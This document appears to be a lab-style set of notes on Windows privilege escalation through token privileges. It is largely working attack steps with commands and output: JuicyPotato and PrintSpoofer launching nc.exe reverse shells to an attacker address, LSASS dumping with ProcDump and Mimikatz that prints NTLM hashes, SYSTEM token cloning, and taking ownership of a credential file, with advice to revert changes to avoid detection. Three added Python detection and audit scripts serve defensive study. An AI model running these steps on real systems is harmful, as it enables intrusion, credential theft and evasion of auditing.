User Privileges
Current User Privileges
```
C:\mrci0x1> whoami /priv

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
Dangerous User Privileges
User privileges, assigned via local or domain Group Policy, allow specific actions on a system.

| Privilege | Display Name | Assigned To (Default Users) | Privilege Description | Escalation Potential |
|---|---|---|---|---|
| SeNetworkLogonRight | Access this computer from the network | Administrators, Authenticated Users | Allows network connections via protocols like SMB or COM+. | Enables network-based attacks if misconfigured. |
| SeRemoteInteractiveLogonRight | Allow log on through Remote Desktop Services | Administrators, Remote Desktop Users | Permits RDP login to a server's login screen. | Facilitates lateral movement or access to systems with elevated rights. |
| SeBackupPrivilege | Back up files and directories | Administrators | Bypasses permissions for system backups, including registry and files. | Allows extraction of sensitive data (e.g., SAM/NTDS) for credential theft. |
| SeSecurityPrivilege | Manage auditing and security log | Administrators | Permits configuring audit policies and managing security logs. | Enables manipulation of audit trails to evade detection. |
| SeTakeOwnershipPrivilege | Take ownership of files or other objects | Administrators | Allows taking ownership of securable objects like files, registry keys, or processes. | Grants control over restricted resources, enabling modification or access. |
| SeDebugPrivilege | Debug programs | Administrators | Permits attaching to or opening any process, including system-critical ones. | Provides access to sensitive processes for code injection or memory dumping. |
| SeImpersonatePrivilege | Impersonate a client after authentication | Administrators, Service Accounts | Allows impersonating users, often exploitable with tools like Juicy Potato. | Enables SYSTEM escalation via token abuse. |
| SeLoadDriverPrivilege | Load and unload device drivers | Administrators | Permits loading/unloading drivers, which run as highly privileged code. | Facilitates malicious driver loading for kernel-level access. |
| SeRestorePrivilege | Restore files and directories | Administrators | Bypasses permissions during restore operations and allows setting object ownership. | Enables overwriting critical files or restoring malicious backups. |
Enable Privileges
CMD: PSBits/EnableAllParentPrivileges (gtworek/PSBits on GitHub)
PowerShell: Enable-Privilege.ps1 0.3.0.0 (PowerShell Gallery, Scripts/Enable-Privilege.ps1)
```
PS C:\mrci0x1> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                             State
============================= ======================================================= ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                                Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                          Disabled
```
https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

Copy the script and paste it onto the target (Windows) machine, then import and run it:

```
PS C:\mrci0x1> Import-Module .\Enable-Privilege.ps1
PS C:\mrci0x1> .\EnableAllTokenPrivs.ps1
PS C:\mrci0x1> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                              State
============================= ======================================== =======
SeTakeOwnershipPrivilege      Take ownership of files or other objects Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Enabled
```
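The table of dangerous privileges and the enable-privilege section above share one practical point: a privilege that `whoami /priv` reports as "Disabled" is still held by the token and can be switched on at any time, so an audit must treat held and enabled privileges the same way. The following Python script is an added example (not code from the original page or from the PSBits/Enable-Privilege projects) that parses a `whoami /priv` listing and flags every held privilege from the table, whatever its state. The listing embedded in it is a constructed sample shaped like the output shown above; the `DANGEROUS` mapping restates the table.

```python
"""Audit a `whoami /priv` listing for high-risk token privileges.

Added example, not part of the original page. "Disabled" in this listing
means the privilege is present in the token but not currently enabled; it
can be enabled via AdjustTokenPrivileges (what the Enable-Privilege and
EnableAllTokenPrivs scripts do), so both states are reported.
"""
import re

# Privileges from the table above, with the risk each one carries.
DANGEROUS = {
    "SeBackupPrivilege": "read any file (SAM/NTDS extraction)",
    "SeRestorePrivilege": "write any file / set object ownership",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process (LSASS dumping, injection)",
    "SeImpersonatePrivilege": "impersonate clients (Potato-style SYSTEM escalation)",
    "SeAssignPrimaryTokenPrivilege": "replace a process primary token",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeSecurityPrivilege": "manage the Security log (audit tampering)",
}

# Constructed sample listing, shaped like `whoami /priv` for a service account.
SAMPLE = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One privilege row: constant name, free-text description, then the state.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privs(text):
    """Return {privilege_name: state} for every privilege row in the listing."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def audit(text):
    """Return sorted (privilege, state, risk) tuples for held dangerous
    privileges, regardless of whether they are currently enabled."""
    privs = parse_privs(text)
    return sorted(
        (name, state, DANGEROUS[name])
        for name, state in privs.items()
        if name in DANGEROUS
    )


if __name__ == "__main__":
    for name, state, risk in audit(SAMPLE):
        print(f"{name:<30} {state:<9} {risk}")
```

Run it against a saved `whoami /priv` capture from any account under review (service accounts in particular); an empty result from `audit` is what a least-privilege baseline should look like for a non-administrative account.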
Attacks
SeImpersonate and SeAssignPrimaryToken
Understanding the Privileges
SeImpersonatePrivilege: allows impersonating a user's token after authentication. Exploitable with JuicyPotato, PrintSpoofer, etc.
SeAssignPrimaryTokenPrivilege: allows replacing a process's primary token. Often used together with SeImpersonatePrivilege.
Note: Service accounts like MSSQL or IIS often hold these privileges.
Common Exploitation Scenarios
Web shell (e.g., ASPX)
Application exploits (e.g., Jenkins)
SQL Server via xp_cmdshell
Why check? The presence of these privileges indicates a fast privilege escalation path.
Exploiting MSSQL Service Account
Step 1: Connect to MSSQL using Impacket
```
mrci0x1@htb$ mssqlclient.py sql_dev@10.129.43.30 -windows-auth
Password:
[*] Encryption required, switching to TLS
[*] ACK: Microsoft SQL Server
SQL>
```
Step 2: Enable xp_cmdshell
```
SQL> enable_xp_cmdshell
[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install
```
Step 3: Confirm User Context
```
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
nt service\mssql$sqlexpress01
```
Step 4: Check Token Privileges
```
SQL> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```
Step 5: Exploit with JuicyPotato (Windows Server 2016 and below)
Upload required tools: JuicyPotato.exe, nc.exe
Setup listener on attacker machine
```
mrci0x1@htb$ sudo nc -lnvp 8443
listening on [any] 8443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.43.30] 50332
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>hostname
hostname
WINLPE-SRV01
```
Execute exploit
```
SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
[+] authresult 0
NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
```
Step 6: Exploit with PrintSpoofer (Windows Server 2019 and later)
Upload required tools: PrintSpoofer.exe, nc.exe
Setup listener
```
mrci0x1@htb$ nc -lnvp 8443
```
Execute exploit
```
SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
```
Alternative Tools
RoguePotato: supports modern Windows versions.
Custom scripts using CreateProcessWithTokenW.
SeDebugPrivilege Abuse
SeDebugPrivilege allows debugging and manipulating any process, including SYSTEM-level ones like LSASS.
This privilege grants full control over any process on the machine. It is typically assigned to administrators, developers, or service accounts.
Identifying SeDebugPrivilege
Check if you have this privilege assigned.
```
C:\mrci0x1> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== ========
SeDebugPrivilege        Debug programs           Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
```
Confirming SeDebugPrivilege means you can target LSASS and other processes even if you're not a full administrator.
Exploit it
Method 1: Dump LSASS Memory for Credentials
Dumping LSASS with ProcDump
```
C:\mrci0x1> procdump.exe -accepteula -ma lsass.exe lsass.dmp

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[15:25:45] Dump 1 initiated: C:\Tools\Procdump\lsass.dmp
[15:25:45] Dump 1 writing: Estimated dump file size is 42 MB.
[15:25:45] Dump 1 complete: 43 MB written in 0.5 seconds
[15:25:46] Dump count reached.
```
Transfer the dump to your attack machine, then parse it locally using Mimikatz.
Extract Credentials with Mimikatz
```
C:\mrci0x1> mimikatz.exe
```
Inside Mimikatz:
```
mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::minidump C:\Tools\lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 23026942 (00000000:015f5cfe)
Session           : RemoteInteractive from 2
User Name         : jordan
Domain            : WINLPE-SRV01
Logon Server      : WINLPE-SRV01
Logon Time        : 3/31/2021 2:59:52 PM
SID               : S-1-5-21-3769161915-3336846931-3985975925-1000
        msv :
         [00000003] Primary
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * NTLM     : cf3a5525ee9414229e66279623ed5c58
         * SHA1     : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
        tspkg :
        wdigest :
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * Password : (null)
        kerberos :
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * Password : (null)
        ssp :
        credman :
```
You now have NTLM hashes for Pass-the-Hash attacks.
Alternative: Manual Dump via Task Manager
If tools like ProcDump are blocked:
Open Task Manager > Details tab
Right-click lsass.exe > Create dump file
Transfer the dump and analyze with Mimikatz
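Both dump paths above (ProcDump and the Task Manager "Create dump file" option) have the same footprint from a defender's side: a process opens lsass.exe with a handle that includes memory-read rights, because MiniDumpWriteDump requires PROCESS_QUERY_INFORMATION and PROCESS_VM_READ on the target. Sysmon Event ID 10 (ProcessAccess) records that granted access mask, so a detection can key on the access bits rather than on tool names. The following Python script is an added example (not code from the original page or from Sysinternals) that scans JSON-exported Sysmon Event 10 records for such LSASS access. The records are constructed samples, and the allowlist of benign source images is an assumption to be tuned per environment.

```python
"""Flag LSASS handle opens with memory-read rights in Sysmon Event ID 10 records.

Added example, not part of the original page. Detection logic keys on the
GrantedAccess mask: any non-allowlisted process obtaining PROCESS_VM_READ
(or PROCESS_ALL_ACCESS) on lsass.exe is reported.
"""
import json

# Windows process access rights (from the Win32 SDK).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_ALL_ACCESS = 0x1FFFFF

# Assumed benign accessors of LSASS; tune for the environment (EDR/AV binaries).
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed Sysmon Event 10 records in a JSON-lines export shape.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
                "TargetImage": r"C:\Windows\System32\lsass.exe",
                "GrantedAccess": "0x1000", "SourceUser": "NT AUTHORITY\\SYSTEM"}),
    json.dumps({"EventID": 10, "SourceImage": r"C:\Tools\Procdump\procdump.exe",
                "TargetImage": r"C:\Windows\System32\lsass.exe",
                "GrantedAccess": "0x1FFFFF", "SourceUser": "WINLPE-SRV01\\jordan"}),
    json.dumps({"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
                "TargetImage": r"C:\Windows\System32\lsass.exe",
                "GrantedAccess": "0x1410", "SourceUser": "WINLPE-SRV01\\jordan"}),
    json.dumps({"EventID": 10, "SourceImage": r"C:\Tools\Procdump\procdump.exe",
                "TargetImage": r"C:\Windows\System32\notepad.exe",
                "GrantedAccess": "0x1FFFFF", "SourceUser": "WINLPE-SRV01\\jordan"}),
]


def is_lsass_dump_access(event):
    """True when a non-allowlisted process opens lsass.exe with memory-read rights."""
    if event.get("EventID") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    if event.get("SourceImage", "").lower() in BENIGN_SOURCES:
        return False
    mask = int(event.get("GrantedAccess", "0"), 16)
    return bool(mask & PROCESS_VM_READ) or mask == PROCESS_ALL_ACCESS


def find_lsass_access(lines):
    """Return (SourceImage, SourceUser, mask) for every matching JSON-lines record."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if is_lsass_dump_access(ev):
            hits.append((ev["SourceImage"], ev["SourceUser"],
                         int(ev["GrantedAccess"], 16)))
    return hits


if __name__ == "__main__":
    for src, user, mask in find_lsass_access(SAMPLE_EVENTS):
        print(f"LSASS handle with access 0x{mask:X} opened by {src} ({user})")
```

Keying on the access mask means a renamed ProcDump or an unfamiliar dumper still trips the rule; the cost is that legitimate security tooling must be allowlisted by image path, which should be verified (signed, expected location) rather than trusted by name alone.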
Method 2: Remote Code Execution as SYSTEM
You can directly impersonate SYSTEM by cloning SYSTEM process tokens.
Using psgetsystem (PowerShell PoC)
Transfer psgetsystem.ps1 to the target
Open elevated PowerShell
Look for a SYSTEM-owned process like winlogon.exe:
```
PS C:\mrci0x1> tasklist

Image Name                PID      Session Name     Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process       0        Services         0           4 K
System                    4        Services         0           116 K
smss.exe                  340      Services         0           1,212 K
csrss.exe                 556      Console          1           5,972 K
winlogon.exe              612      Console          1           10,408 K
```
Run PoC to spawn SYSTEM shell:
```
PS C:\mrci0x1> ./psgetsys.ps1 [MyProcess]::CreateProcessFromParent(612, "cmd.exe", "")
```
You should get a new shell as SYSTEM:
```
C:\mrci0x1> whoami
nt authority\system
```
Automating PID retrieval:
```
# $PID is a read-only automatic variable in PowerShell (the current process id),
# so the target PID is stored under a different name.
PS C:\mrci0x1> $lsassPid = (Get-Process -Name lsass).Id
PS C:\mrci0x1> [MyProcess]::CreateProcessFromParent($lsassPid, "cmd.exe", "")
```
SeTakeOwnershipPrivilege Abuse
SeTakeOwnershipPrivilege allows a user to take ownership of securable objects such as files, folders, registry keys, or Active Directory objects.
Once ownership is obtained, you can modify permissions even if you previously had no access to the object.
Typically, only Administrators have this privilege, but sometimes it's assigned to service accounts (backup, shadow copy) or accidentally to standard users.
Identifying SeTakeOwnershipPrivilege
Check if your current user holds this privilege:
```
PS C:\mrci0x1> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                        State
============================= ================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or objects Disabled
SeChangeNotifyPrivilege       Bypass traverse checking           Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set     Disabled
```
Enabling SeTakeOwnershipPrivilege
If the privilege shows as disabled, you can enable it using PowerShell modules such as Enable-Privilege.ps1 or EnableAllTokenPrivs.ps1 (assuming you can run them).
```
PS C:\mrci0x1> Import-Module .\Enable-Privilege.ps1
PS C:\mrci0x1> .\EnableAllTokenPrivs.ps1
PS C:\mrci0x1> whoami /priv

Privilege Name                Description                        State
============================= ================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or objects Enabled
SeChangeNotifyPrivilege       Bypass traverse checking           Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set     Enabled
```
Now the privilege is active in the current session.
Exploitation Scenario: Access Restricted File
Step 1: Identify Target File
Assume you discover a restricted file cred.txt in a share:
```
PS C:\mrci0x1> Get-ChildItem 'C:\Department Shares\Private\IT\cred.txt' | Select FullName,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

FullName                                 LastWriteTime         Attributes Owner
--------                                 -------------         ---------- -----
C:\Department Shares\Private\IT\cred.txt 6/18/2021 12:23:28 PM Archive    WINLPE-SRV01\sccm_svc
```
Step 2: Take Ownership
```
PS C:\mrci0x1> takeown /f "C:\Department Shares\Private\IT\cred.txt"

SUCCESS: The file (or folder): "C:\Department Shares\Private\IT\cred.txt" now owned by user "WINLPE-SRV01\mrci0x1".
```
Step 3: Confirm Ownership
```
PS C:\mrci0x1> Get-ChildItem 'C:\Department Shares\Private\IT\cred.txt' | select name,directory,@{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

Name     Directory                       Owner
----     ---------                       -----
cred.txt C:\Department Shares\Private\IT WINLPE-SRV01\mrci0x1
```
Ownership was successfully changed.
Step 4: Modify ACL to Grant Full Access
Ownership alone doesn't grant read permission. You need to modify the ACL:
```
PS C:\mrci0x1> icacls "C:\Department Shares\Private\IT\cred.txt" /grant mrci0x1:F

processed file: C:\Department Shares\Private\IT\cred.txt
Successfully processed 1 files; Failed processing 0 files
```
Step 5: Read the File
```
PS C:\mrci0x1> Get-Content "C:\Department Shares\Private\IT\cred.txt"

NIX01 admin
root:n1X_p0wer_us3er!
```
You obtained credentials that may lead to lateral movement or further escalation.
Step 6: Revert Changes (Optional but Recommended)
After reading, it's good practice to restore original ownership and permissions to avoid detection.
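The two modifying steps in this scenario (takeown in Step 2 and the icacls grant in Step 4) each rewrite the file's security descriptor, and Windows Security event 4670 ("Permissions on an object were changed") records the old and new descriptor in SDDL form when object auditing is enabled. The following Python script is an added example (not code from the original page) that diffs such SDDL pairs and reports exactly those two marks: an owner (`O:`) change, and a newly added allow ACE carrying full access (`FA`) in the DACL (`D:`). The 4670-style records are constructed samples and the SIDs in them are placeholders.

```python
"""Detect takeown/icacls-style changes from old/new SDDL security descriptors.

Added example, not part of the original page. Parses the O:/G:/D:/S:
components of an SDDL string, then compares old and new descriptors as
carried by Security event 4670 (OldSd / NewSd fields).
"""
import re

# One ACE: "(type;flags;rights;object_guid;inherit_guid;sid)".
ACE = re.compile(r"\(([^)]*)\)")


def parse_sddl(sddl):
    """Split an SDDL string into owner, group, DACL flags and DACL ACE tuples."""
    parts = {}
    for key in ("O", "G", "D", "S"):
        # Each component runs until the next component marker or end of string.
        m = re.search(key + r":(.*?)(?=(?:O|G|D|S):|$)", sddl)
        parts[key] = m.group(1) if m else ""
    dacl_flags = parts["D"].split("(", 1)[0]  # e.g. "PAI" (protected, auto-inherited)
    aces = [tuple(a.split(";")) for a in ACE.findall(parts["D"])]
    return {"owner": parts["O"], "group": parts["G"], "flags": dacl_flags, "aces": aces}


def diff_descriptors(old_sddl, new_sddl):
    """Return findings: ('owner_changed', old, new) and/or
    ('full_access_granted', sid) for each new allow ACE with FA rights."""
    old, new = parse_sddl(old_sddl), parse_sddl(new_sddl)
    findings = []
    if old["owner"] != new["owner"]:
        findings.append(("owner_changed", old["owner"], new["owner"]))
    for ace in new["aces"]:
        if ace not in old["aces"] and ace[0] == "A" and ace[2] == "FA":
            findings.append(("full_access_granted", ace[5]))
    return findings


# Constructed 4670-style records; SIDs are placeholders, not real accounts.
SAMPLE_4670 = [
    {"EventID": 4670, "SubjectUserName": "mrci0x1",
     "ObjectName": r"C:\Department Shares\Private\IT\cred.txt",
     "OldSd": "O:S-1-5-21-1-1-1-1105G:S-1-5-21-1-1-1-513D:PAI(A;;FA;;;BA)(A;;FA;;;S-1-5-21-1-1-1-1105)",
     "NewSd": "O:S-1-5-21-1-1-1-1201G:S-1-5-21-1-1-1-513D:PAI(A;;FA;;;BA)(A;;FA;;;S-1-5-21-1-1-1-1105)"},
    {"EventID": 4670, "SubjectUserName": "mrci0x1",
     "ObjectName": r"C:\Department Shares\Private\IT\cred.txt",
     "OldSd": "O:S-1-5-21-1-1-1-1201G:S-1-5-21-1-1-1-513D:PAI(A;;FA;;;BA)(A;;FA;;;S-1-5-21-1-1-1-1105)",
     "NewSd": "O:S-1-5-21-1-1-1-1201G:S-1-5-21-1-1-1-513D:PAI(A;;FA;;;BA)(A;;FA;;;S-1-5-21-1-1-1-1105)(A;;FA;;;S-1-5-21-1-1-1-1201)"},
    {"EventID": 4670, "SubjectUserName": "SYSTEM",
     "ObjectName": r"C:\Windows\Temp\x.log",
     "OldSd": "O:SYG:SYD:(A;;FA;;;SY)",
     "NewSd": "O:SYG:SYD:(A;;FA;;;SY)(A;;FR;;;BU)"},
]


def scan(events):
    """Return (subject, object, findings) for each event with at least one finding."""
    out = []
    for ev in events:
        findings = diff_descriptors(ev["OldSd"], ev["NewSd"])
        if findings:
            out.append((ev["SubjectUserName"], ev["ObjectName"], findings))
    return out


if __name__ == "__main__":
    for subject, obj, findings in scan(SAMPLE_4670):
        print(f"{subject} changed {obj}: {findings}")
```

The third sample (a read-only ACE added by SYSTEM) produces no finding, which keeps the rule focused on the ownership-then-full-control pattern this scenario relies on; 4670 only fires for objects whose SACL requests it, so the shares that hold sensitive files need object auditing configured for the rule to see anything.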
Files of Interest
Look for files containing sensitive data that may lead to escalation:
C:\inetpub\wwwroot\web.config - web app credentials
%WINDIR%\repair\sam, %WINDIR%\repair\system - registry hives
%WINDIR%\system32\config\*.sav - backup hives
KeePass databases: *.kdbx
Files like passwords.*, creds.*, secrets.*
Configuration files with hardcoded credentials
Alternative: Active Directory Object Ownership
In Active Directory, you can take ownership of:
GPOs
User objects
OUs
For example, you can use SharpGPOAbuse to assign GPO edit rights and push malicious startup scripts.